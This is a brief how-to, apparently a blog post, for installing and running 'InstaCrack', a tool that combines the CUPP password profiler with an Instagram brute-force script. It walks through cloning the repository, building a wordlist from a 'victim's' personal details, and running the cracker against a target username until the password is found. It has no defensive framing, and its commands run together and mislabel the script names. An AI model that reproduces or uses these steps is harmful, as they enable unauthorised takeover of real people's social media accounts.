InstaCrack
This tool is combained from
CUPP - Common User Passwords Profiler Tool
Crackinsta Tool
apt get update && upgradepkg updatepkg install python3pkg install pythonpkg install gitgit clone https://github.com/JTECHCODE/crackinsta.git
Tool Installed
ls (list all folders)
now instacrack folder appears
cd instacrackpip install requestspip install bs4
cupp.py tool used to create password list

python3 cupp.pypython3 cupp.py -hpython3 cupp.py -i
Now password list created for victim
Change the password file name as pass.txt
mv oldname newnamemv filename.txt pass.txt
Open the file content
cat pass.txt
instacrack.py tool used for brute force attack
python crack.py
Enter the username
Put the seconds between password
Now the tool started to crack the password
Now you wait for the right password


0 Comments